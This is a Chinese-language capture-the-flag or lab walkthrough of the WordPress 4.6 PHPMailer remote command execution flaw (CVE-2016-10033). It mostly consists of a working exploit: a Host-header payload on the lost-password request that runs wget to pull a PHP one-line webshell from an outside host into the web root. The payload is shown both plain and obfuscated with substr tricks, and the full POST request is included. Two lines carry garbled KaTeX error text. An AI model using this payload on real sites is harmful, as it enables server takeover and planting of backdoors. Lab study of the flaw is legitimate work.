漏洞介绍
漏洞名称:WordPress远程命令执行(CVE-2016-10033)
漏洞描述:
WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞(CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。
当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。
漏洞版本
WordPress <= 4.6.0
PHPMailer < 5.2.18
打靶过程
1.打开靶场
2.进入登录界面,点击忘记密码,使用Burpsuit抓包
漏洞位置在忘记密码界面在找回密码时WordPress会使用PHPmailer发送重置密码邮件,这个时候PHPmailer<=5.2.18时存在RCE。
3.构建payload
此payload意思是在x.x.x.x/a.txt 下载a.txt文件,将内容写入a.php中,其中a.txt里面写的是php一句话木马。
aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /var/www/html/a.php x.x.x.x/a.txt}} null)
注意事项
空格 —> KaTeX parse error: Expected '}', got 'EOF' at end of input: {substr{10}{1}{tod_log}}
/ —> KaTeX parse error: Expected '}', got 'EOF' at end of input: {substr{0}{1}{spool_directory}}
转换后的payload
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}a.php${substr{10}{1}{$tod_log}}x.x.x.x${substr{0}{1}{$spool_directory}}a.txt}} null)
4.将payload写入到host中,post请求包内容如下
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}a.php${substr{10}{1}{$tod_log}}x.x.x.x${substr{0}{1}{$spool_directory}}a.txt}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 58
Content-Type: application/x-www-form-urlencodedwp-submit=Get+New+Password&redirect_to=&user_login=admin
下方302状态码 响应包 即为执行成功
工具连接a.php,获取到flag